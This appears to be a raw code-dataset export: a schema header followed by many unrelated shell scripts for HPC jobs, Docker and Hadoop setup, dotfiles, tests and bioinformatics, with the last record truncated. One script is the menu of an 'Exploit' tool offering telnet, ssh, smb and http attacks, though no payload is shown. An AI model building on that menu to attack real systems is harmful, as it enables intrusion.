blob_id
stringlengths
40
40
language
stringclasses
1 value
repo_name
stringlengths
4
115
path
stringlengths
2
970
src_encoding
stringclasses
28 values
length_bytes
int64
31
5.38M
score
float64
2.52
5.28
int_score
int64
3
5
detected_licenses
listlengths
0
161
license_type
stringclasses
2 values
text
stringlengths
31
5.39M
download_success
bool
1 class
da4d1232c2cbe18b0b21c9e2d74415f0eb891244
Shell
HiJuly/async-lp-sgd
/src/job-run.pbs
UTF-8
510
2.75
3
[]
no_license
#!/bin/bash # We only need a single processor to print hello, so ppn=1. # A modest timeout of 1 minute is used, which should be # plenty of time for this job to complete. #PBS -l nodes=1:ppn=24 #PBS -l walltime=99:00:00 #PBS -N gradient #PBS -k n # Enter the directory where this script (and our executable) is. cd "$...
true
2419932629e22e495074acad44509cc14d4f84ed
Shell
zkstewart/Various_scripts
/blasting/run_mms2.sh
UTF-8
945
2.703125
3
[]
no_license
#!/bin/bash -l #PBS -N mms2_ #PBS -l walltime=120:00:00 #PBS -l mem=750G #PBS -l ncpus=8 cd $PBS_O_WORKDIR ################################# # Specify program locations MMSEQDIR=/home/stewarz2/various_programs/MMseqs2/mmseqs/bin VARSCRIPTDIR=/home/stewarz2/scripts/Various_scripts # Specify query FASTA location QUE...
true
e146da5d35b54401556c2edcbb5706cf97fc60b1
Shell
dkuppitz/titan-docker
/scripts/install-hadoop2.sh
UTF-8
1,974
2.84375
3
[]
no_license
#!/bin/bash HADOOP_VERSION=2.2.0 sed -i 's/required[ ]*pam_loginuid/optional\tpam_loginuid/g' /etc/pam.d/sshd wget http://archive.apache.org/dist/hadoop/common/hadoop-$HADOOP_VERSION/hadoop-$HADOOP_VERSION.tar.gz tar xfz hadoop-$HADOOP_VERSION.tar.gz && rm hadoop-$HADOOP_VERSION.tar.gz && ln -s /usr/local/hadoop-$HA...
true
f413ad8fc8bde8356d6dbb3d1bc1544c70c0777c
Shell
hapass/cpp_courses
/yandex/yellow_belt/matrix/run.sh
UTF-8
255
2.75
3
[]
no_license
make cd bin cat test.txt | ./main > out.txt red=`tput setaf 1` green=`tput setaf 2` reset=`tput sgr0` cmp "out.txt" "verify.txt"; status=$? if [[ $status = 0 ]]; then echo "${green}Test passed.${reset}" else echo "${red}Test failed.${reset}" fi
true
fddd5e9eed48361459bc3d685042b2afcd887ba0
Shell
nakijun/scc
/as/test.sh
UTF-8
493
2.890625
3
[ "ISC" ]
permissive
#!/bin/sh set -e file=${1?} exec >test.log exec 2>&1 tmp1=`mktemp` tmp2=`mktemp` trap "rm -f a.out $tmp1 $tmp2" 0 2 3 ./as-$cpu $file sed -n '/^\// ! { s%.*/%% s%^[ ]*%% s%[ ]*$%% /^$/d s%[ ][ ]*%\ %g p }' $file | nl -b a > $tmp1 ../objdump/objdump | sed -n '/^data:/,$ { /^data:/ ! { s%.*:%% s%^[...
true
b75de18e35b019f7754b8cf07c125812f842296d
Shell
gportay/domake
/tests.bash
UTF-8
4,694
3.59375
4
[ "MIT" ]
permissive
#!/bin/bash # # Copyright (c) 2017-2020 Gaël PORTAY # # SPDX-License-Identifier: MIT # set -e set -o pipefail run() { lineno="${BASH_LINENO[0]}" test="$*" echo -e "\e[1mRunning $test...\e[0m" } ok() { ok=$((ok+1)) echo -e "\e[1m$test: \e[32m[OK]\e[0m" } ko() { ko=$((ko+1)) echo -e "\e[1m$test: \e[31m[KO]\e[0...
true
f0141587623ebf9b9bf6bfa42ed197daf88098b3
Shell
javier-lopez/docker-wine
/run-skype.sh
UTF-8
829
2.515625
3
[ "MIT" ]
permissive
xhost +si:localuser:$(whoami) >/dev/null docker run \ --privileged \ --rm \ -ti \ -e DISPLAY \ -v /tmp/.X11-unix:/tmp/.X11-unix:ro \ -v ~/docker-data/wine:/home/docker/wine/ \ -v /etc/localtime:/etc/localtime:ro \ -u docker \ yantis/wine /bin/bash -c "sudo initialize-graphics >/dev/null 2>/dev/null; v...
true
a8478454d5352035f1b6843ff71418042b395cf4
Shell
espaciomore/STE-work-tools
/CommPro/ViewVersion.sh
UTF-8
581
3.6875
4
[]
no_license
#!/bin/bash if [ -z "$1" ]; then echo "View Version: [US|UK.QA|PROD] [0-9]" echo "ERROR : Invalid Argument : Missing arguments!" exit fi FILTER="" if [ -n "$3" ] && [ "$3" = "-s" ]; then FILTER="Build" else FILTER="Build|timestamp|campaign|commit" fi R1="s/\s+<\/?pre>//g" R2="s/(<.*>)+//g" R3="s/^\s+//g" RE...
true
bcfb6e11cc13a4d575d0b9b457b12d64bb926559
Shell
jorira/dotfiles
/.ide.template
UTF-8
1,235
3.15625
3
[]
no_license
#!/bin/bash set -e cmd_docker_compose="docker-compose" main_service="express" # 前処理 $cmd_docker_compose stop $cmd_docker_compose up -d # デーモンでtmuxセッション開始 tmux new-session -d # 水平分割2つ分 tmux split-window -v tmux split-window -v # パネル上部の罫線を20ポイント移動 tmux resize-pane -t 0 -U 20~ #tmux resize-pane -t 1 -U 20~ tmux resize...
true
0ba7104597b49f6a45c4c36b587595f03c1963b5
Shell
ondrejsika/dotfiles
/apply-mac.sh
UTF-8
627
2.53125
3
[]
no_license
#!/bin/bash # Bash echo ". $(pwd)/core/3rdparty/git-prompt.sh" >> ~/.profile echo ". $(pwd)/core/3rdparty/git-completion.sh" >> ~/.profile echo ". $(pwd)/core/3rdparty/complete_alias" >> ~/.profile echo ". $(pwd)/core/bashrc" >> ~/.profile echo "" >> ~/.bashrc echo ". ~/.bashrc" >> ~/.profile echo "" >> ~/.bash_alia...
true
e21c9d37e91f6054e36deca9a9bd8d9543b36739
Shell
necrose99/sabayon-dockerscripts
/sabayondocker-functions.sh
UTF-8
5,137
3.59375
4
[]
no_license
#!/bin/bash COMMIT_MESSAGES=( '[commit] i went apeshit about that' '[emerge] fuck that. i just compiled some shit' '[push] i felt so bored that i decided to give everything to dogs' '[push] elitarism will kill us all eventually' '[commit] i heard someone had an hangover.. i am not sure about that.. really' ...
true
7e268c01f664148e43c91184db012506f3dc8b61
Shell
ikatza/altups_scripts
/make_minos_config_ups_skeleton
UTF-8
4,055
3.5625
4
[]
no_license
#! /usr/bin/env bash # # create a skeleton UPS setup for minos_config # this provides an area to set some MINOS environment variables # # ./make_skeleton <version> [<qualifier>] # e.g. ./make_skeleton v02 # product="minos_config" version="" # like v02 qual="default" # flavor="NULL" # don't ...
true
37b9d98a35e94e0448fa7b48adb3d77f92c8f419
Shell
Zane-/dotfiles
/scripts/lightbar.sh
UTF-8
830
3.3125
3
[]
no_license
#!/bin/sh OPTIONS="\tdefault\n\tcolor\n\trainbow\n\tgradient\n\tsiren\n\tpulse" ROFI=`echo $OPTIONS | rofi -dmenu -i -lines 6 -font "Roboto Mono for Powerline 9" -columns 1 -width 15 -dpi 180 -p light -color-window '#ff282c34, #00000000, #00000000' -color-normal '#ff282c34, #99666666, #ff282c34, #22ffffff, #99e5c07b' ...
true
1ff3e866e570fe2aad2d457abe133a7c42c1ae6e
Shell
aidinum/devops-tools-startup
/bin/aws-ecr-set-git-prefix
UTF-8
2,388
4.03125
4
[]
no_license
#!/bin/bash set -e DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )" source "${DIR}/bash-lib" # Transform long options to short ones for arg in "$@"; do shift case "$arg" in "--help") set -- "$@" "-h" ;; "--repository-name") set -- "$@" "-R" ;; "--modify") set -- "$@" "-m" ...
true
59a2a793b43b65c5922197e21ed19fd06a57a338
Shell
izongjun/tool
/ss-config.sh
UTF-8
2,677
3.046875
3
[]
no_license
#!/bin/bash echo "============== update ==============" apt-get update echo "============== install ==============" apt-get install python vim python-pip ssh pip install setuptools wheel shadowsocks echo "============== modify openssl.py ==============" sed -i “s/EVP_CIPHER_CTX_cleanup/EVP_CIPHER_CTX_reset/g” /usr/l...
true
3ed346783849d0541743390e9e949781bc32ec32
Shell
GSI-CS-CO/bel_projects
/tools/phtif/asl/phtif.sh
UTF-8
400
2.765625
3
[]
no_license
#!/bin/sh # script for deployment on ASL . /etc/functions log 'initializing' ARCH=$(/bin/uname -m) HOSTNAME=$(/bin/hostname -s) log 'apply HACK to fix suspicous dynamic library hazard' ln -s /usr/lib/libetherbone.so.5 /lib/libetherbone.so.5 log 'copying software to ramdisk' cp -a /opt/$NAME/$ARCH/usr/bin/phtif /usr...
true
f5c1e294f7759c2ec1ab9dfb4258e888c1baf7c5
Shell
SFU-HiAccel/merlin-compiler
/trunk/dist/make-dist.sh
UTF-8
3,412
2.765625
3
[ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ]
permissive
#!/bin/bash dir=$(cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd) source $dir/../docker/common.bash $dir/../docker/docker-build.sh # save to ./merlin if [ -d merlin ]; then echo "warning: removing existing merlin folder" rm -rf merlin/ fi # build release package export MERLIN_COMPILER_HOME=$dir/.. export PATH=$PATH...
true
b89c398006b9ab0c4e75ff98df55656b95b26ae7
Shell
sa6mwa/miscellaneous
/scripts/build-ffmpeg-with-libfdk-aac.sh
UTF-8
4,237
3.140625
3
[ "Apache-2.0" ]
permissive
#!/bin/bash if [ "$1" != "okilidokili" ]; then echo "This script is tailored for Ubuntu Mate 20.10 groovy and" echo "may not build on other debian-based systems." echo "Also confirmed working for: Ubuntu 20.04.2 LTS focal" echo "Good to go? Build like this..." echo echo "$0 okilidokili" exit fi set -xe ...
true
7024fac5b8d8025f70210e377f9b3b934e916976
Shell
megrawlab/IndeCut
/software/fanmod/run_fanmod.sh
UTF-8
1,198
3.15625
3
[]
no_license
#!/bin/bash thisdir=`pwd` prog=$thisdir/source-code/fanmod_linux ingraph_dir=$thisdir/../graphs graphname=$1 ngraphs=$2 input_graph=$ingraph_dir/$graphname.fanmod outdir=$thisdir/fn_out/$graphname.$ngraphs if [ ! -d $outdir ] then mkdir -p $outdir fi motifsize=3 nsamps=100000 full_enum=1 infilename=$infile dire...
true
21b13bc85f04f36935d2f7001ed01b97204dad47
Shell
jmatsumura/docker_lgtview
/install_lgtview.sh
UTF-8
10,129
4.03125
4
[]
no_license
#!/bin/bash echo "----------------------------------------------------------------------------------------------------" echo -e "\nWelcome to the LGTView installer. Please follow the prompts below that will help configure the security level of the site." echo -e "\n\n*** PLEASE NOTE ***" echo -e "\nWhile there are var...
true
cf65f16aec19ad014006562b6dde7658c9150b42
Shell
pickuserna/mac_study
/linux/chkdir.sh
UTF-8
90
2.609375
3
[]
no_license
#!/bin/bash backup_dir="/opt/mrepo/" if [ ! -d backup_dir ] then mkdir -p $backup_dir fi
true
9b58a3f774a6026e4ce1c530c03b4a80be3fd6f7
Shell
panhenggui/study
/quantdo/dbbackup/insertOper.sh
UTF-8
1,034
3.640625
4
[]
no_license
#!/bin/bash tar -xvf $1 if [ $? -eq 0 ];then echo -e "\033[32;1msuccess\033[0m" else echo -e "\033[31;1mfalse\033[0m" exit fi for i in $(ls *.sql) do echo "use $2;" > input.sql grep -iE "INSERT INTO \`t_oper" $i >> input.sql done #cd /tmp #touch /tmp/input.sql #echo "" > /tmp/input.sql #grep -iE "INSERT...
true
0fb6101595396baf5370419f2df551792e4c2036
Shell
sameergk/missc
/clone_specific_branch_to_new_repo.sh
UTF-8
558
2.828125
3
[]
no_license
#create new git repo < use github or through command line> # create new directory and new local repo 1. git init #setup remote for the local repo and specifiy the branch that you want to pull 2. git remote add origin -t $BRANCH_NAME $REMOTE_GIT_URL #pull the content to local repo 3. git pull #check the current ...
true
c9800c0bbe7b65484e215fb717352909246a8245
Shell
carlosaguilar1928/NTI320-FINAL
/nagios-server
UTF-8
980
2.984375
3
[]
no_license
#!/bin/bash yum install -y nagios systemctl enable nagios systemctl start nagios setenforce 0 yum install -y httpd systemctl enable httpd systemctl start httpd yum install -y nrpe systemctl enable nrpe systemctl start nrpe yum install -y nagios-plugins-all yum install -y nagios-plugins-nrpe #create the password u...
true
e51979133481b52e2c08929787d43ba4ad03114f
Shell
bgens/autohash.sh
/autohash.sh
UTF-8
279
3.515625
4
[]
no_license
#!/bin/bash if [ $# -ne 3 ]; then echo $0: usage: plaintextPasswordFile outputHashFile HashType echo "Hash Types: des standard 56 bit DES-based crypt(3) md5 MD5 sha-256 SHA-256 sha-512 SHA-512" exit 1 fi while read -r line; do mkpasswd -m $3 -s $line >> $2 done < "$1"
true
b9017141ea12212ef23596f40ed36a0bc54b326a
Shell
THS-on/VanishedRootHandler
/usr/bin/is_root_removable.sh
UTF-8
820
3.796875
4
[]
no_license
#!/bin/bash # A script to test whether a Lernstick root is on a removable media. function get_root_device() { # Extract the root mount info, eg., # overlay on / type overlay (rw,noatime,lowerdir=/live/rootfs/filesystem.squashfs/,upperdir=/live/persistence/sdb2/./rw,workdir=/live/persistence/sdb2/./work) local RO...
true
944c465ad2117929ead4b6bc4eb68df622e03f7f
Shell
mikechen66/analytics-zoo
/docs/docs/colab-notebook/run-notebook-pytorch.sh
UTF-8
1,215
3.0625
3
[ "Apache-2.0" ]
permissive
#!/bin/bash dir=${ANALYTICS_ZOO_HOME}/docs/docs/colab-notebook/orca/quickstart pytorchFiles=("pytorch_lenet_mnist_data_creator_func" "pytorch_lenet_mnist" "pytorch_distributed_lenet_mnist") index=1 for f in $pytorchFiles do filename="${dir}/${f}" echo "#${index} start example for ${f}" #timer start=$(date "+%s...
true
f54ef81f1ed073bbc3a556a8b9a4a6ea9849540e
Shell
jlguenego/example-git
/squash.sh
UTF-8
460
2.796875
3
[]
no_license
#!/usr/bin/env bash set -eau SOURCE_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )" . "${SOURCE_DIR}/gitlib/base.sh" [ -d test ] && rm -rf test git init test cd test echo a>a.txt git add * git commit -m c1 echo b>a.txt git add * git commit -m c2 echo c>a.txt git add * git commit -m c3 git -...
true
5e24dc66855d6eee14f91316e3487b37cde2da94
Shell
usnistgov/frvt
/morph/scripts/run_testdriver.sh
UTF-8
1,986
4.15625
4
[ "LicenseRef-scancode-public-domain", "LicenseRef-scancode-warranty-disclaimer" ]
permissive
#!/bin/bash source ../common/scripts/utils.sh configDir=config configValue="" if [ ! -e "$configDir" ]; then echo "${bold}[ERROR] Missing ./$configDir folder!${normal}" exit $failure fi outputDir=validation rm -rf $outputDir; mkdir -p $outputDir # Usage: ../bin/validate_morph detectNonScannedMorph|detectScannedM...
true
ed51eb83d76b934654575e64b76a2afca056eeb0
Shell
joe-bricknell/sam-docker-example
/build.sh
UTF-8
629
3.046875
3
[]
no_license
#!/bin/bash # get delve and compile go get -u github.com/go-delve/delve/cmd/dlv GOARCH=amd64 GOOS=linux go build -o ./dlv github.com/go-delve/delve/cmd/dlv # get aws-lambda code go get -u github.com/aws/aws-lambda-go/... # Build binary with debug symbols buildDev() { local lambda=$1 echo "Building ${lambda} ......
true
076826152097bc695f4c7b49e6e9874c37ed406c
Shell
abwolf/slim_scripts
/slrun.SLiM.calc_admix_prop.single_mutation.sh
UTF-8
687
2.625
3
[]
no_license
#!/bin/bash #SBATCH --get-user-env #SBATCH --mem=10G #SBATCH --time 22:00:00 #SBATCH --qos=1day #SBATCH --output=slrun.SLiM.calc_admix_prop.single_mutations.sh.%A_%a.o source ~/.bashrc date mdl=$( echo Tenn ) echo $SLURM_JOB_NAME echo $SLURM_ARRAY_TASK_ID echo $mdl echo '' #Define recombination rate for recomb in ...
true
f0129e27f88bb4bf2efc179faaf902e7be6ecdf4
Shell
linearregression/packaging
/installers/install.sh
UTF-8
1,518
3.71875
4
[]
no_license
#!/bin/bash set -e DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) KAFKA_FILE=`ls ${DIR}/confluent-kafka-* | grep -E 'confluent-kafka-[0-9].*'` PACKAGES="common rest-utils schema-registry kafka-rest camus kafka-connect-hdfs kafka-connect-jdbc librdkafka" DEB=`ls ${DIR}/*.deb || true` if [ -n "$DEB" ]; then ...
true
ac417e87c3fd392348e3525b25ab970ce75754b2
Shell
Hoektronics/Test-Fixtures
/eagle_package_release
UTF-8
3,570
3.46875
3
[]
no_license
#!/bin/bash ######################################################################### # # usage: ./eagle_package_release board_name [version] # # running this script will generate an electronics release file suitable for release on sourceforge and for production use. # it will produce the following files in a .zip fil...
true
0a8c75d252e79956d8a8edaf4b9922167981e228
Shell
openshift/release
/ci-operator/step-registry/baremetal/lab/pre/load-balancer/baremetal-lab-pre-load-balancer-commands.sh
UTF-8
5,583
3.484375
3
[ "Apache-2.0" ]
permissive
#!/bin/bash set -o nounset set -o errexit set -o pipefail [ -z "${AUX_HOST}" ] && { echo "AUX_HOST is not filled. Failing."; exit 1; } SSHOPTS=(-o 'ConnectTimeout=5' -o 'StrictHostKeyChecking=no' -o 'UserKnownHostsFile=/dev/null' -o 'ServerAliveInterval=90' -o LogLevel=ERROR -i "${CLUSTER_PROFILE_DIR}/ssh-...
true
7c32b593d0f44c57b706619ddf371346a225cc1a
Shell
btcs-nambn/dotfiles
/zsh/nambn.zsh
UTF-8
1,597
3.015625
3
[]
no_license
ZSH=~/dotfiles/zsh if [[ -z "$ZSH_CACHE_DIR" ]]; then ZSH_CACHE_DIR="$ZSH/cache" fi setopt histignorealldups sharehistory # add a function path fpath=($ZSH/functions $ZSH/completions $fpath) # Load all stock functions (from $fpath files) called below. autoload -U compaudit compinit # Load plugin to fpath then co...
true
f858be687a0fadf6080075a6e0a1e7a31f1c0279
Shell
bcalvert/StopDiLepCode
/LimitSetting/Scripts/StopCrossToDataCardSimple.sh
UTF-8
1,508
3.015625
3
[]
no_license
#! /bin/bash #Input Parameters Lumi=19300 LumiFracErr=.01 SigEff=0.5 KinEff=0.02 BkgNumLumi=5300 BkgdNum=100 BkgScaled=$(echo "scale=10; $Lumi * $BkgdNum / $BkgNumLumi" | bc) #Input Parameters MassArray=($(cut -d\| -f2 StopCrossSection.txt | cut -d ' ' -f2)) #GeV XSecArray=($(cut -d\| -f3 StopCrossSection.txt | cut -...
true
492cbde4c6e8f952e880e8d0750adcd54b865889
Shell
mspieth/rssdler
/rssdler.init
UTF-8
3,633
3.703125
4
[]
no_license
#!/bin/sh # INSTRUCTIONS (assumes debian-based distro) # If you want something like this for OSX, check out the wiki page StartupOSX # save to /etc/init.d/rssdler (NOT rssdler.sh!!) # You must change user # if you installed with setup.py # and keep your config in ~/.rssdler/config.txt # that is all you need to change h...
true
43dc89b87a05b2064c1ec55bc56fa98b103c9882
Shell
vraja2/parallel-LU-decomposition
/batch_script_parallel.run
UTF-8
821
2.859375
3
[]
no_license
#!/bin/bash #PBS -l walltime=00:30:00 #PBS -l nodes=8:ppn=12 #PBS -N lu_parallel #PBS -q cs #PBS -j oe # Load MPI module (Enable MPI in user environment) module load mvapich2/2.1rc1-intel-15.0 # Change to the directory from which the batch job was submitted cd $PBS_O_WORKDIR # Create a temporary hostfile to run a s...
true
0b72c38c11b0b27cb3e4e8a2f41aa97a3509b2c6
Shell
rangerzzoxz/oraclexe-apex
/build.sh
UTF-8
2,761
3.71875
4
[ "MIT" ]
permissive
#!/bin/bash #Notes # #Some input is required before running #Search for CHANGEME and modify before running # # #- Passwords #All passwords (expect for APEX Admin) are set to "oracle" by default. You can change accordingly # # #- ratom #This tool allows you to edit files in atom on your desktop rather than vi on server...
true
f906d2c87feab6bde06062fc354197c582b29a46
Shell
laulabbumc/MosquitoSmallRNA
/bin/siRNA_Phasing_pipeline.sh
UTF-8
980
2.578125
3
[ "MIT" ]
permissive
#!/bin/bash bowtie -f -v 0 -a -S -k 100000 -m 100000 --strata --best -p 1 $refdir/ucsc_$2_genome $1 $1.siRNA_phasing.sam bash $bindir/sam2bam.sh $1.siRNA_phasing.sam $1.siRNA_phasing.bam bash $bindir/bam2bed.sh $1.siRNA_phasing.bam $1.siRNA_phasing.bed cut -f 4 $1.siRNA_phasing.bed | sort | uniq -c | sort -nr |...
true
060bb7cf9b7c43cb452108d682e5d8af585106d9
Shell
seemethere/dotfiles
/bin/wclock
UTF-8
460
3.40625
3
[]
no_license
#!/bin/sh # Command-line world clock # Taken from http://stackoverflow.com/questions/370075/command-line-world-clock # .worldclock.zones file looks like: # US/Pacific # Europe/Berlin # Chile/Continental : ${WORLDCLOCK_ZONES:=$HOME/.worldclock.zones} : ${WORLDCLOCK_FORMAT:='+%Y-%m-%d %H:%M:%S %Z'} while read -r zone...
true
82a3d0563a43c51a0b1e387d7a1a52e3b3b61495
Shell
aszady/p5
/build_images.sh
UTF-8
1,012
2.9375
3
[]
no_license
#!/bin/bash set -x buildimg() { IMG_PATH="$2" NAME="$1" pushd $IMG_PATH docker rmi -f $NAME docker build -t $NAME . popd } # Python – light and easy buildimg p5_airly microservices/translators/airly buildimg p5_icm microservices/translators/icm # Erlang – nice and clean cd microservices/rest_endpo...
true
a1399ee9e3096c693ec01d64666ccf57878a3316
Shell
thbar/scijava-scripts
/mediawiki-mirror.sh
UTF-8
2,767
4.3125
4
[]
no_license
#!/bin/sh if test $# != 2 then cat >&2 << EOF Usage: $0 <original-wiki-URL> <mirror-wiki-URL> This script tries to keep a mirror of a MediaWiki up-to-date. It does so by inspecting the recent changes and calling a slightly modified MediaWiki API to allow for exporting more than one revision of a page. It is incompl...
true
05756f3bfbf0aeb881e082420cd91ab940fe5fa2
Shell
charleszheng44/bashscript
/bookmark.sh
UTF-8
1,096
3.90625
4
[]
no_license
#!/usr/bin/env bash BOOKMARKFN=$HOME/.config/bash/apps/bookmarks # list available bookmarks function list() { if [ -f "$BOOKMARKFN" ]; then cat $BOOKMARKFN fi } # goto bookmark function gobm() { [ -z "$1" ] && echo "please specify a bookmark" if [ -f "$BOOKMARKFN" ]; then while IFS= ...
true
c18f2772e0d2c4debe58dd7bdcbcf3f9b341260e
Shell
TakeOver/dotfiles
/archive/debian/.bash_aliases
UTF-8
667
2.5625
3
[]
no_license
# aliases alias h='history' alias ls='ls -A --color=auto' alias ll='ls -lAh --color=auto' alias lt='ls -lAht --color=auto' alias df='df -h' alias reboot='sudo reboot' alias halt='sudo shutdown -h now' alias v='vim' alias sv='sudo vim' alias g='grep --color=auto' alias ping='ping -c 1' alia...
true
cc4134827002763c8eab8592890f0c8bf2919d52
Shell
iothome-rc/iothome
/contrib/init/iothomed.init
UTF-8
1,305
3.609375
4
[ "MIT" ]
permissive
#!/bin/bash # # iothomed The IoTHome core server. # # # chkconfig: 345 80 20 # description: iothomed # processname: iothomed # # Source function library. . /etc/init.d/functions # you can override defaults in /etc/sysconfig/iothomed, see below if [ -f /etc/sysconfig/iothomed ]; then . /etc/sysconfig/iothomed...
true
b867112064b0ad8183af1febddeb4b208f9568a9
Shell
jkoz/panel
/sbattery
UTF-8
1,628
3.28125
3
[]
no_license
#!/usr/bin/bash #set -x default="#90707070" glyph_battery_charging="" glyph_battery_100="\ue021" glyph_battery_90_100="\ue022" glyph_battery_80_90="\ue023" glyph_battery_80_60="\ue024" glyph_battery_60_40="\ue025" glyph_battery_40_20="\ue026" glyph_battery_20_0="\ue027" bat_color="#99000000" bat_info=$(acpi -b) st...
true
16f028be0b829118d0b0eac9811da359c9fade02
Shell
smedsem/pf_import
/script/analysis/check_max_field_length.sh
UTF-8
160
2.5625
3
[]
no_license
#!/bin/bash echo 'Start analysis' awk -F'\t' ' { for (i=1;i<=NF;i++) l[i]=((x=length($i))>l[i]?x:l[i])} END {for (i in l) print "Column"i":",l[i]}' $1
true
b98b22c26aa296329f7c2ed0358a9617d7f500dd
Shell
trustyou/meetups
/python-c/run_examples.sh
UTF-8
710
3.09375
3
[ "MIT" ]
permissive
#!/usr/bin/env bash set -e # do "pip install -r requirements.txt" before first run. It's nice to run this in a virtualenv # install and run artihmetic module as smoke test pushd . >/dev/null cd arithmeticmodule ./setup.py install python -c "import arithmetic; print(arithmetic.add(1, 1337))" popd >/dev/null # insta...
true
a3991cb592b0aed210ae5a76f7b23734f61d2cdf
Shell
Cloudxtreme/snltd-monitor
/checks/hardware/SUNW,Sun-Fire-T200/check_PSUs.sh
UTF-8
772
3.3125
3
[]
no_license
#!/bin/ksh #============================================================================= # # check_PSUs.sh # ------------- # # Check all PSUs in the machine are powered up and functioning correctly. # Specific to T2000 platforms. # # v1.0 Initial Relase # #============================================================...
true
1b66f948eadb9be72dfa329b8c26a31b221837d0
Shell
charlesvestal/dotfiles
/raspberrypi.sh
UTF-8
5,519
3.234375
3
[]
no_license
echo "Let's get some stuff set up! First, we'll ask for your administrator password up front so we can install all the things we need to." # Ask for the administrator password upfront. sudo -v # Keep-alive: update existing `sudo` time stamp until the script has finished. while true; do sudo -n true sleep 60 ...
true
c18182d6f3643805c884ce718bd0e66405a7d41f
Shell
youarebish/bb
/hh.sh
UTF-8
481
3.203125
3
[]
no_license
#!/bin/bash # create virsh computer read -p "要创建的虚拟机名称:" a if [$? -eq 0 ];then virsh dumpxml rh7_node01 > $a.xml sed -i "s/rh7_node01/$a/" /etc/libvirt/qemu/$a.xml sed -i "s/<uuid>1453cad8-8721-4b0c-b264-2ee3f51b5bc9</uuid>/<uuid>1453cad8-8721-4b0c-b264-2ee3f51b5$a</uuid>" /etc/libvirt/qemu/$a.xml sed -i "/...
true
f11bfc17534baf0f2576a8169fac3a48fc420224
Shell
Sakib1418/Email_summarization-with-Unsupervised-Learning
/get_skip_thoughts_pretrained_models.sh
UTF-8
588
2.609375
3
[ "MIT" ]
permissive
# Directory to download the pretrained models to. PRETRAINED_MODELS_DIR="skip_thoughts/pretrained/" mkdir -p ${PRETRAINED_MODELS_DIR} cd ${PRETRAINED_MODELS_DIR} # Download and extract the unidirectional model. wget "http://download.tensorflow.org/models/skip_thoughts_uni_2017_02_02.tar.gz" tar -xvf skip_thoughts_uni...
true
d37cbfa84ae511b3974432b6779c94b7fbf18cfb
Shell
endlessm/eos-keyring
/scripts/endless-ca-trust-system
UTF-8
3,012
3.875
4
[]
no_license
#!/bin/bash -e # endless-ca-trust-system - Trust Endless SSL CA certificate systemwide # Copyright (C) 2017 Endless Mobile, Inc. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either versio...
true
c7e45e9199417cbe3d8c6afa0bfed6d20f47717f
Shell
5l1v3r1/NobodysLand
/EA.sh
UTF-8
1,016
3.296875
3
[ "MIT" ]
permissive
cyan='\e[0;36m' green='\033[92m' red='\e[1;31m' yel='\e[0;33m' orange='\e[38;5;166m' clear figlet "Exploit" figlet "Menu" echo -e $green"=========================" echo -e $red"1)telnet" echo -e $red"2)ssh" echo -e $red"3)smb" echo -e $red"4)http" echo -e $green"=========================" read -p " NLF~#: " att...
true
3ce0f588fdba854c9bf90d5d78933afc70e38199
Shell
upayavira/solr-utils
/start.sh
UTF-8
791
3.65625
4
[]
no_license
#!/bin/bash if [[ $# = 0 ]]; then echo "$0 [build] [push] [start] [cleanup]" exit 1 else ARGS=$* fi if [ -z "$ZOOKEEPER" ]; then ZOOKEEPER=192.168.99.100; fi if [ -z "${NODENAME}" ]; then NODENAME=192.168.99.100; fi if [ -z ${CONFIG_NAME} ]; then CONFIG_NAME=basic; fi if [ -z "$BUILD_NUMBER" ]; then VERSI...
true
fd612fec1e8532a5e5e498a8fb4671082279200b
Shell
CellFateNucOrg/Taiyaki_train
/02_runAlignFastq.sh
UTF-8
1,732
3.265625
3
[]
no_license
#!/bin/bash ## Allocate resources #SBATCH --time=0-04:00:00 #SBATCH --mem=256G #SBATCH --cpus-per-task=32 #SBATCH --array=1-5 #SBATCH --partition=all ##SBATCH --mail-user= ##SBATCH --mail-type=END,FAIL ## you should submit as many jobs as there are barcodes in barcodesOfInterest ## (don't forget to include unclassfied...
true
8459c024857fb2e73f6e1c84e978776bb3d04c27
Shell
eniotnam/shell-bourne
/shell/deplace
UTF-8
276
3.484375
3
[]
no_license
#! /bin/sh if [ $# -ne 2];then echo "utilisation: $0 nom_de_fichier repertoire">&2 exit 1 fi if ! test -f "$1" ; then echo "$1 n'est pas un fichier !">&2 exit 2 fi if ! test -d "$2" ; then echo "$2 n'est pas un repertoire !">&2 exit 3 fi mv "$1" "$2" exit 0
true
ee48d9b4c82fc94534d0e0da5a3671c8bceac6d2
Shell
jspablo/Vagrant
/ipa-server-addusers.sh
UTF-8
1,715
3.546875
4
[]
no_license
#!/bin/bash # ipa-server-addusers.sh source common.sh #/vagrant/scripts/common.sh # # NOTA PREVIA GENERAL: # # En este script se han omitido expresamente algunas comprobaciones # previas a cada acción, y en general todas las comprobaciones de error. # Se deja al alumno que las implemente como desee...
true
68e60bf284870825d01e35c0495a9cd4c28b6e4e
Shell
yyekhlef/guestbook-api-server
/guestbook-simple-frontend/src/main/scripts/startup.sh
UTF-8
484
2.953125
3
[ "Apache-2.0" ]
permissive
#!/bin/ash echo "Testing runtime env" echo echo "content of /etc/nginx/html" ls /etc/nginx/html echo "------------------------------------" echo "content of /etc/nginx/html/config" ls /etc/nginx/html/config echo "------------------------------------" if /usr/local/bin/confd -onetime -backend env then echo e...
true
a01cb9d76a3b17b18c7d4c41ebcf23725231552d
Shell
burcuozcelik/trajectory
/CG_versions/scripts/parser/generate_sbatchs_stage1.sh
UTF-8
1,666
2.671875
3
[]
no_license
#!/bin/bash DIR="./sbatchs-stage1/stage1-" for i in 1 do for solver in "cg" "cgs" "bicg" "bicgsta" "iccg" do for j in 4 8 16 28 do for k in 10 100 500 do for n in 10 20 40 do #for ctype in "wDetectors" "woDetectors" for ctype in "woDetectors" do echo $solver-...
true
cd6b27c811eee39a2cce1438c8328b4a4d6c3056
Shell
hooei/docker-compose
/docker_onlion/ELK/build.sh
UTF-8
330
3.28125
3
[]
no_license
